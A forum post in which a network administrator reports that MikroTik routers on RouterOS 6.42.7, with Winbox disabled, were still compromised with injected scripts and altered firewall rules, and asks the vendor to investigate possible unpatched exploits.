Good Day
First post here. It was my understanding that upgrading to 6.42.7 and disabling winbox access would thwart the popular coinhive exploit. As an attacker could not gain access to credentials through winbox exploit. Problem is, I keep on finding routers running on 6.42.7 with /ip service winbox disabled happily jumping traffic, scheduled scripts, and obscure firewall and NAT rules, … Offcourse I found this in the process of upgrading my routers to 6.44, as I manage 315 routers, this is rather a task. I will attach config and inject scripts, including support files.
Please rename support.rsc to support.rif. Perhaps there is binary payloads left behind or even a yet unknown way to gain access to routers? I also often find my drop rules disabled and the router under a DNS amplification attack? Also on 6.42.7 winbox disabled. As a company rule: Winbox is not ever allowed in the input chain, ever. I guess all I am saying is update to 6.44 if you are a user, however, please let the mikrotik engineers check for yet unknown exploits which might not have been patched.
I will not regard anything below 6.43.12 as safe…
supout.rsc (83.4 KB)
firstrun.rsc (857 Bytes)
inject.rsc (122 Bytes)
command.rsc (829 Bytes)